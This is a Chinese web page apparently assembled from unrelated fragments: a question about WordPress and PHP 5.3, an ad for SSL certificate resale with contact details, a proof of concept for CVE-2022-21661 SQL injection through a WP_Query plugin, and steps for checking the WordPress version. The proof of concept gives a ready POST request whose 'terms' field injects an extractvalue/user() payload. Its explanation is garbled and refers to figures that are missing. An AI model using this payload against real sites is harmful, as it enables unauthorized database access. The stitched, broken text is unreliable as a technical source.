wordpress5.3的简单介绍

wordpress博客支持php5.3吗

当然支持，不过有些插件或主题需要在高PHP版本上才能运行，现在很多空间可以自由切换PHP版本，从PHP5.2到PHP7.0。看我兹料连系了解

开阳ssl适用于网站、小程序/APP、API接口等需要进行数据传输应用场景，ssl证书未来市场广阔！成为创新互联建站的ssl证书销售渠道，可以享受市场价格4-6折优惠！如果有意向欢迎电话联系或者加微信：18982081108（备注：SSL证书合作）期待与您的合作！

CVE-2022–21661 WordPress 《=5.3, 携带WP_QUERY插件SQL注入

POC：

POST

ecs_ajax_settings  {"post_id":1,"current_page":2,"widget_id":"65054a0","max_num_pages":5}

action ecsload

query {"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}

这个问题来源于temrs没过滤 再加上 一个相等条件绕过；

相等条件类似于,下面过滤条件没有执行。导致term携带了一些脏数据

if(a==b){

return;

}

sanialize(term);

1下图所示，我们的插件里action钩子勾住的是这个方法，这个方法利用了WP_QUERY存在漏洞的类，注意的是action 一定要有对应的值，所以这个漏洞限制在。运用了WP_QUERY的插件里。所以我们拿了ajax_pagnition这个插件，定义了action为ecsload

2 下图所示 我们进入方法，此方法构造了sql

3 clean query方法 进去看看，2的里面调用了这个，箭头指定的地方已经打过补丁，强制term为int所以就无法利用了，补丁前不是这样，而是对term没有做任何操作

4进入transform_query，在看一下里面。下面试sanitize其实可以绕过，从而不过滤term这样，条件都成立，term逃出，sql成立

怎么查看wordpressrevolution 5.3.1.5

这里介绍三种方法。

1进入后台“仪表盘”，该页面的左上角图片显示了wordpress的版本号。

2 查看网页源代码 在网站的主页空白处点右键弹出菜单，选择“查看网页源代码”。 在出现的源码页面里查找 meta name="generator" content= Content值就是wordpress的版本号。

3 查看readme文件 进入wampsever的www目录下网站文件所在的文件夹 (一般为“C:\wamp\www\example.com”)，打开“readme”，该文件的正上方显著的位置写着wordpress的版本。